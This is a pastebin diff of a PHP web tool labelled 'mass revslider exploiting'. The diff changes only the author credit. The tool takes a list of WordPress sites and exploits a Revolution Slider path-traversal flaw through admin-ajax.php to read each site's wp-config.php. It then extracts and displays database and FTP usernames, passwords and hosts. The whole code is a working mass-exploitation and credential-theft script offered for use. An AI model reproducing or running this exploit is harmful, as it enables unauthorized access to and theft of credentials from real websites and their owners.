SHOW:
|
|
- or go back to the newest paste.
1 | <body bgcolor="#000000" text="white"> | |
2 | <center> | |
3 | <img src='https://s.w.org/about/images/fanart/logo_500x500.png' height="150" width="150"></img><br> | |
4 | <font face='courier' color=red size='+1'> | |
5 | - | mass revslider exploiting<br>by ThePrince MaGnoM<br>http://codersleet.com/</font><br> |
5 | + | mass revslider exploiting<br>by Juan De Lemos<br>http://codersleet.com/</font><br> |
6 | <form method='post'> | |
7 | <textarea name='sites' cols='50' rows='12'></textarea><br> | |
8 | <input type='submit' name='go' value='get'> | |
9 | </form> | |
10 | <?php | |
11 | ||
12 | function findit($mytext,$starttag,$endtag) { | |
13 | $posLeft = stripos($mytext,$starttag)+strlen($starttag); | |
14 | $posRight = stripos($mytext,$endtag,$posLeft+1); | |
15 | return substr($mytext,$posLeft,$posRight-$posLeft); | |
16 | } | |
17 | error_reporting(0); | |
18 | set_time_limit(0); | |
19 | $ya=$_POST['go']; | |
20 | $co=$_POST['sites']; | |
21 | ||
22 | if($ya){ | |
23 | $e=explode("\r\n",$co); | |
24 | foreach($e as $bda){ | |
25 | //echo '<br>'.$bda; | |
26 | $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'; | |
27 | $dn=($bda).($linkof); | |
28 | $file=@file_get_contents($dn); | |
29 | if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){ | |
30 | echo'<center><font face="courier" color=red >----------------------------------------------</font></center>'; | |
31 | echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>"; | |
32 | echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>"; | |
33 | echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>"; | |
34 | echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>"; | |
35 | echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>"; | |
36 | } | |
37 | elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){ | |
38 | echo'<center><font face="courier" color=red >----------------------------------------------</font></center>'; | |
39 | echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>"; | |
40 | echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>"; | |
41 | echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>"; | |
42 | echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>"; | |
43 | } | |
44 | else{echo "<center><font face='courier' color='yellow' >".$bda." Not Work</font></center>";} | |
45 | echo'<center><font face="courier" color=red >----------------------------------------------</font></center>'; | |
46 | } | |
47 | ||
48 | } | |
49 | ||
50 | ?> |